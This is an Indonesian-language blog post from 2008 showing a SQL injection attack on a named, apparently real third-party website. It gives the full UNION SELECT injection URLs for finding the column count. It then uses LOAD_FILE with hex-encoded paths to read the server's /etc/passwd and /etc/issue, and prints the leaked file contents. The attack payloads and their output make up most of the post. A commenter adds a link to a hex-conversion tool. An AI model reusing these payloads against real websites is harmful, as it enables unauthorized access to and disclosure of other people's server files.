28 February 2008

Sql injection LOAD_FILE

kali ini saya mencoba mengunakan LOAD_FILE pada sql injection untuk melihat file file sesitif.


victim:

http://sonyadakar.com


vuln:
http://sonyadakar.com/products1/content.php?id=-1[sql]


seperti biasa cari jumlah kolomnya sampai true.

(browser sudah tidak mengeluarkan error lagi)


%20union%20select%201,2/*

%20union%20select%201,2,3/*

dst.. sampai

%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/*

http://sonyadakar.com/products1/content.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/*

setelah itu kita ganti angka yang keluar dengan LOAD_FILE.


formatnya adalah LOAD_FILE(/etc/passwd) dimana /etc/passwd adalah patch file yang mau kita lihat


tetapi sebelumnya /etc/passwd harus di rubah ke bentuk hex terlebih dahulu


hex dari /etc/passwd adalah 0x2f6574632f706173737764.


kita juga bisa menganti dengan file lain misal /etc/issue dan ubah ke bentuk hex.


hex dari /etc/issue adalah 0x2F6574632F6973737565.


Setelah merubah file yang kita ingin lihat ke bentuk hex, mari kita lanjutkan dengan memasukannya ke dalam url


http://sonyadakar.com/products1/content.php?id=-1%20union%20select%201,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7,8,9,10,11,12/*

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
----------------cut-------------------------------

ups.. terlihat kan isi filenya ;D

kita coba dengan memasukan LOAD_FILE(0x2F6574632F6973737565) ke dalam url

http://sonyadakar.com/products1/content.php?id=-1%20union%20select%201,LOAD_FILE(0x2F6574632F6973737565),3,4,5,6,7,8,9,10,11,12/*

Red Hat Enterprise Linux ES release 4 (Nahant Update 6)
Kernel \r on an \m

di 11:11 AM

Share |

Label:

2 komentar:

Anonymous said...

string to hex visit http://irvianx.co.cc/hex.php

August 2, 2009 at 12:02 AM  
aziz said...

mantab

August 2, 2012 at 1:00 AM  

Post a Comment

Subscribe to: Post Comments (Atom)
powered by irvian